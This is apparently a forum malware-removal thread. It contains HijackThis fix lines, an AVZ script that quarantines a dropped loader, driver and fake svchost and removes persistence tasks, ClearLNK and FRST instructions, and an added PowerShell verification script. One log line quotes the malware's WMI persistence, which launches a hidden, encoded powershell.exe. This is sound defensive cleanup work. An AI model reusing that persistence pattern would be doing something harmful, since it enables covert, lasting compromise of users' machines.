Run HijackThis from the Autologger folder (on Windows Vista/7/8/10 start it via the right-click menu, Run as administrator) and fix only these lines:
Code:
O7 - IPSec: Name: netbc (2020/06/03) - {4e2ad893-370c-4a8b-a999-fd29bec4024b} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: \Microsoft\Windows Defender\MP Scheduled Scan - d:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (file missing)
O25 - WMI Event: Systems Manage Consumer - Systems Manage Filter - Event="__InstanceModificationEvent WITHIN 5601 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", powershell.exe -NoP -NonI -W Hidden -E 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
Run the following script in AVZ from the Autologger folder:
Code:
begin
 // look for rootkit hooks before touching the files
 SearchRootkit(true, true);
 // stop the dropped loader, quarantine it together with the driver and the rest of the drop folder
 TerminateProcessByName('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe');
 QuarantineFile('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe', '');
 QuarantineFile('C:\Windows\System32\Drivers\anjclr16.SYS', '');
 QuarantineFileF('c:\programdata\microsoft\devicesync\systemsync', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
 DeleteFile('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe', '');
 QuarantineFile('C:\Program Files\Windows NT\GlassCMD\svchost.exe', '');
 // remove the drop folder itself
 DeleteFileMask('c:\programdata\microsoft\devicesync\systemsync', '*', true);
 DeleteDirectory('c:\programdata\microsoft\devicesync\systemsync');
 // restore the Internet zone (Zones\3) ActiveX settings to safe values
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 // remove the persistence tasks
 DeleteSchedulerTask('Microsoft Assist Job');
 DeleteSchedulerTask('SystemFlushDns');
 // hand locked files to BootCleaner, run the system cleanup and reboot
 BC_ImportALL;
 ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
 BC_Activate;
 RebootWindows(true);
end.
The computer will reboot.
Run this script in AVZ:
Code:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
A quarantine archive quarantine.zip will appear in the AVZ folder; upload that file via the Send requested quarantine link above the first post in the thread.
Download, unpack and run the ClearLNK utility. Copy the text below into the utility's window and click "Лечить" (Fix).
Code:
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Program Files\K-Lite Codec Pack\Filters\DirectVobSub\vsfilter.dll",DirectVobSub] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Windows\system32\ff_vfw.dll",configureVFW] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavaudio.ax",OpenConfiguration] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavvideo.ax",OpenConfiguration] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavsplitter.ax",OpenConfiguration] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Windows\system32\xvidvfw.dll",Configure] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk" -> ["C:\Windows\System32\rundll32.exe" =>> "C:\Windows\system32\x264vfw.dll",Configure] -> ( is missing)
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Портативные программы\Система\Блокировка AUTORUN.lnk" -> ["C:\Program Files\Портативные программы\Система\Блокировка AUTORUN USB_CD_DVD\USBGuard.exe"]
Attach the resulting report.
Download Farbar Recovery Scan Tool and save it to your Desktop.
Note: choose the version that matches your operating system. If you are not sure which version fits your system, download both and try to run them; only one of them will run on your system.
Run the program. When it starts, click Yes to accept the warning.
Click Scan.
When the scan finishes, the reports FRST.txt and Addition.txt are created in the folder the program was run from.
Attach both files to your next post (preferably both in one archive).
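The steps above remove three persistence mechanisms seen in the logs: a WMI event subscription (the O25 line: filter "Systems Manage Filter" bound to the command-line consumer "Systems Manage Consumer" that launches a hidden, encoded powershell.exe), two scheduled tasks, and a local IPSec policy that blocks inbound TCP/445. The following PowerShell script is an added post-cleanup check, not part of the helper's instructions or of any of the tools named above. It assumes an elevated Windows PowerShell 5.1 prompt (Get-WmiObject is not present in PowerShell 7) and uses only the names and paths that appear in the logs on this page; with -Remove it deletes any WMI subscription or scheduled-task leftovers it finds.

```powershell
# Added example: verify after the reboot that the persistence items from the logs are gone.
# Run in an elevated Windows PowerShell 5.1 prompt. Pass -Remove to delete leftovers.
param([switch]$Remove)

$ns           = 'root\subscription'
$filterName   = 'Systems Manage Filter'        # from the HijackThis O25 line
$consumerName = 'Systems Manage Consumer'      # from the HijackThis O25 line
$taskNames    = 'Microsoft Assist Job', 'SystemFlushDns'   # from the AVZ script
$paths        = @(                             # from the AVZ script
    'C:\ProgramData\Microsoft\DeviceSync\SystemSync',
    'C:\Windows\System32\Drivers\anjclr16.SYS',
    'C:\Program Files\Windows NT\GlassCMD\svchost.exe'
)

# 1. WMI event-subscription persistence. The binding is listed first so that it is
#    removed before the filter and consumer it references.
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
             Where-Object { $_.Filter -like "*$filterName*" -or $_.Consumer -like "*$consumerName*" }
$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter |
             Where-Object { $_.Name -eq $filterName }
$consumers = Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer |
             Where-Object { $_.Name -eq $consumerName }

foreach ($obj in @($bindings) + @($filters) + @($consumers)) {
    if ($null -eq $obj) { continue }
    Write-Warning "WMI leftover: $($obj.__PATH)"
    if ($obj.CommandLineTemplate) { Write-Warning "  runs: $($obj.CommandLineTemplate)" }
    if ($Remove) { $obj | Remove-WmiObject }
}

# 2. Scheduled tasks removed by DeleteSchedulerTask in the AVZ script.
foreach ($t in Get-ScheduledTask -TaskName $taskNames -ErrorAction SilentlyContinue) {
    Write-Warning "Scheduled task leftover: $($t.TaskPath)$($t.TaskName)"
    if ($Remove) { $t | Unregister-ScheduledTask -Confirm:$false }
}

# 3. Local IPSec policy 'netbc' (HijackThis O7). HijackThis removes it; this only reports it.
$ipsec = netsh ipsec static show all 2>$null | Select-String -SimpleMatch 'netbc'
if ($ipsec) { Write-Warning "IPSec policy 'netbc' is still present; fix the O7 line in HijackThis again." }

# 4. Files and folders that should no longer exist after the AVZ script and BootCleaner ran.
foreach ($p in $paths) {
    if (Test-Path -LiteralPath $p) { Write-Warning "Still on disk: $p" }
}

Write-Output 'Check finished. No warnings above means the items from the logs are gone.'
```

Run it once without -Remove to see what is left, then with -Remove only if it reports WMI or task leftovers; anything still on disk after the reboot should be quarantined with AVZ rather than deleted by hand so the sample reaches the helpers.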